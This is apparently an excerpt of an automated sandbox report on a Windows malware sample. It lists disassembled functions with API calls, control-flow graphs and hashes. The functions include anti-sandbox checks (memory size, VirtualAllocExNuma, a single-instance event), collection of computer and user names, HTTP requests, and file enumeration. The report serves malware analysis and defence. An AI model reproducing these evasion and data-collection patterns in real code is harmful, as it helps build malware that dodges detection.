                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01089298,?,003D110C,?,00000000,?,003D1110,?,00000000,003D0AEF), ref: 003C6ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 003C6AE8
                            • CloseHandle.KERNEL32(00000000), ref: 003C6AF9
                            • Sleep.KERNEL32(00001770), ref: 003C6B04
                            • CloseHandle.KERNEL32(?,00000000,?,01089298,?,003D110C,?,00000000,?,003D1110,?,00000000,003D0AEF), ref: 003C6B1A
                            • ExitProcess.KERNEL32 ref: 003C6B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                            • String ID:
                            • API String ID: 2931873225-0
                            • Opcode ID: 5f4d6395aff1af8d8e5bdd92b013dcde451f995f85316a5ed3a18b026028e5fa
                            • Instruction ID: c81cbdf78560937b4258deb426cd9d45c06c68473f8af1cf3d3a712f3ccdfe1f
                            • Opcode Fuzzy Hash: 5f4d6395aff1af8d8e5bdd92b013dcde451f995f85316a5ed3a18b026028e5fa
                            • Instruction Fuzzy Hash: A131D4B1900608AADB06FBA0DC57FEE7778AB14344F50451CF602EA191EF746D05DBA6
                            Function 003C6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1436 3c6af3 1437 3c6b0a 1436->1437 1439 3c6b0c-3c6b22 call 3c6920 call 3c5b10 CloseHandle ExitProcess 1437->1439 1440 3c6aba-3c6ad7 call 3caad0 OpenEventA 1437->1440 1446 3c6ad9-3c6af1 call 3caad0 CreateEventA 1440->1446 1447 3c6af5-3c6b04 CloseHandle Sleep 1440->1447 1446->1439 1447->1437
                            APIs
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01089298,?,003D110C,?,00000000,?,003D1110,?,00000000,003D0AEF), ref: 003C6ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 003C6AE8
                            • CloseHandle.KERNEL32(00000000), ref: 003C6AF9
                            • Sleep.KERNEL32(00001770), ref: 003C6B04
                            • CloseHandle.KERNEL32(?,00000000,?,01089298,?,003D110C,?,00000000,?,003D1110,?,00000000,003D0AEF), ref: 003C6B1A
                            • ExitProcess.KERNEL32 ref: 003C6B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                            • String ID:
                            • API String ID: 941982115-0
                            • Opcode ID: dde687d3e1cacb85eee3832ba1ad9aad4cff4b57f1e897f886f6e92b1ce29633
                            • Instruction ID: 483a6fe3f105f22673f84626d20af7d365911afde9ce3215cf9d07bec748271c
                            • Opcode Fuzzy Hash: dde687d3e1cacb85eee3832ba1ad9aad4cff4b57f1e897f886f6e92b1ce29633
                            • Instruction Fuzzy Hash: E4F058B4A44209ABE702ABA1DC0BFBE7B78EB14741F10451CB507E91C1DBB46D44EBA7
                            Function 003B47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003B4839
                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 003B4849
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1274457161-4251816714
                            • Opcode ID: 89f6470eeb59027e22e83f974124519fd4591873070e673046bcc8ce0b4b5280
                            • Instruction ID: c4578cf0b6b745727a2bb065fa3cbb2b6c6989891ea293b4bac6185a058de939
                            • Opcode Fuzzy Hash: 89f6470eeb59027e22e83f974124519fd4591873070e673046bcc8ce0b4b5280
                            • Instruction Fuzzy Hash: A12162B1D00209ABDF10DF54E845BDE7B74FB44314F108625F519AB2C1EB706A09CF81
                            Function 003C51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                              • Part of subcall function 003B6280: InternetOpenA.WININET(003D0DFE,00000001,00000000,00000000,00000000), ref: 003B62E1
                              • Part of subcall function 003B6280: StrCmpCA.SHLWAPI(?,0108E7B8), ref: 003B6303
                              • Part of subcall function 003B6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003B6335
                              • Part of subcall function 003B6280: HttpOpenRequestA.WININET(00000000,GET,?,0108DFD8,00000000,00000000,00400100,00000000), ref: 003B6385
                              • Part of subcall function 003B6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003B63BF
                              • Part of subcall function 003B6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003B63D1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003C5228
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                            • String ID: ERROR$ERROR
                            • API String ID: 3287882509-2579291623
                            • Opcode ID: 72d6afba42a9a7635ab712a42e80372c9dffe017e620a1566838f53fea802fb2
                            • Instruction ID: 93db41ac6ad04fe5507e840c141d46c349189d214b7cabe1be401aafb0440ce5
                            • Opcode Fuzzy Hash: 72d6afba42a9a7635ab712a42e80372c9dffe017e620a1566838f53fea802fb2
                            • Instruction Fuzzy Hash: E311F570900608ABCB16FBA0D952FED7778AF50304F804558E90A8E592EF34AF06DB92
                            Function 003B1220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1493 3b1220-3b1247 call 3c89b0 GlobalMemoryStatusEx 1496 3b1249-3b1271 call 3cda00 * 2 1493->1496 1497 3b1273-3b127a 1493->1497 1499 3b1281-3b1285 1496->1499 1497->1499 1501 3b129a-3b129d 1499->1501 1502 3b1287 1499->1502 1504 3b1289-3b1290 1502->1504 1505 3b1292-3b1294 ExitProcess 1502->1505 1504->1501 1504->1505
                            APIs
                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 003B123E
                            • ExitProcess.KERNEL32 ref: 003B1294
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 803317263-2766056989
                            • Opcode ID: 8baaa6055f99996d1a8dddaa867e818f8d88bbcee3b7b26d8ebbe12d6c503de6
                            • Instruction ID: d0b3fe46223a359b6509849882fe235cf117ee26987b39c6fac7bdee404eef2d
                            • Opcode Fuzzy Hash: 8baaa6055f99996d1a8dddaa867e818f8d88bbcee3b7b26d8ebbe12d6c503de6
                            • Instruction Fuzzy Hash: 05014BB0940308AAEB10EBE4DC49BAEBB78AB14705F608458F705FA280D7B46A458799
                            Function 003C78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C7910
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003C7917
                            • GetComputerNameA.KERNEL32(?,00000104), ref: 003C792F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: cd78d43ffa4227cc56d301c617fc83fa6ba658972d1326f35c3bef9c8f5cdb1d
                            • Instruction ID: 4b893b6936f5d5cc32ab2607236d1af9427bd30add2feca547593f0e9763e9da
                            • Opcode Fuzzy Hash: cd78d43ffa4227cc56d301c617fc83fa6ba658972d1326f35c3bef9c8f5cdb1d
                            • Instruction Fuzzy Hash: 7B0162B1904204EFC710DF98DD45FAABBB8F704B61F10421AF945E3680C37459048BA2
                            Function 003B1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003B112B
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 003B1132
                            • ExitProcess.KERNEL32 ref: 003B1143
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AllocCurrentExitNumaVirtual
                            • String ID:
                            • API String ID: 1103761159-0
                            • Opcode ID: dfd3ba0a6c18272f46cc2ba0d05b4d2d9caac028db7365aad86fb40ef4954d8c
                            • Instruction ID: 16493c11ffa36b2e6085d8d4110f41308b8dd2d1878b7cde9bb619007dd5fa8e
                            • Opcode Fuzzy Hash: dfd3ba0a6c18272f46cc2ba0d05b4d2d9caac028db7365aad86fb40ef4954d8c
                            • Instruction Fuzzy Hash: 9CE086B0945308FBE7106BA0DC0AB587678EB04B45F500044F70CBA5C0C6F82605EA9A
                            Function 003B10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003B10B3
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 003B10F7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: 4b48b97e0f27016e261e9784790e87f3d2f83dd221151b0afdeb34df0d4f3e33
                            • Instruction ID: a547e31f6553f2c8b07235ca2967542b870e2044e966d081930935346246b45d
                            • Opcode Fuzzy Hash: 4b48b97e0f27016e261e9784790e87f3d2f83dd221151b0afdeb34df0d4f3e33
                            • Instruction Fuzzy Hash: CAF0E2B1641208BBE714ABA4AC59FBAB7E8E705B15F300448F608E7280D572AF04DAA1
                            Function 003B1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C7910
                              • Part of subcall function 003C78E0: RtlAllocateHeap.NTDLL(00000000), ref: 003C7917
                              • Part of subcall function 003C78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 003C792F
                              • Part of subcall function 003C7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003B11B7), ref: 003C7880
                              • Part of subcall function 003C7850: RtlAllocateHeap.NTDLL(00000000), ref: 003C7887
                              • Part of subcall function 003C7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 003C789F
                            • ExitProcess.KERNEL32 ref: 003B11C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AllocateName$ComputerExitUser
                            • String ID:
                            • API String ID: 3550813701-0
                            • Opcode ID: ae8c213dbd60eac26982f3048f80428b95467a8d7d9ad7764d7f581ae5e72c0e
                            • Instruction ID: 1d806d81104ee076c3e1711b2f877e85126436ec45466310670021ab372e1ef5
                            • Opcode Fuzzy Hash: ae8c213dbd60eac26982f3048f80428b95467a8d7d9ad7764d7f581ae5e72c0e
                            • Instruction Fuzzy Hash: BDE0ECB991430152DA0173B5AC1BF2A339C5B24749F040428FF09DA502FA29ED04DA67

                            Non-executed Functions

                            Function 003C38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 003C38CC
                            • FindFirstFileA.KERNEL32(?,?), ref: 003C38E3
                            • lstrcat.KERNEL32(?,?), ref: 003C3935
                            • StrCmpCA.SHLWAPI(?,003D0F70), ref: 003C3947
                            • StrCmpCA.SHLWAPI(?,003D0F74), ref: 003C395D
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 003C3C67
                            • FindClose.KERNEL32(000000FF), ref: 003C3C7C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 1125553467-2524465048
                            • Opcode ID: bcd048cacf957a2336e2eb5e211cb6919c050619fe932facd5a4b276625b5b02
                            • Instruction ID: d100b5e6f64f0fc063cb9deafe4d031c21b507481f025fb29978c3ea73de79ce
                            • Opcode Fuzzy Hash: bcd048cacf957a2336e2eb5e211cb6919c050619fe932facd5a4b276625b5b02
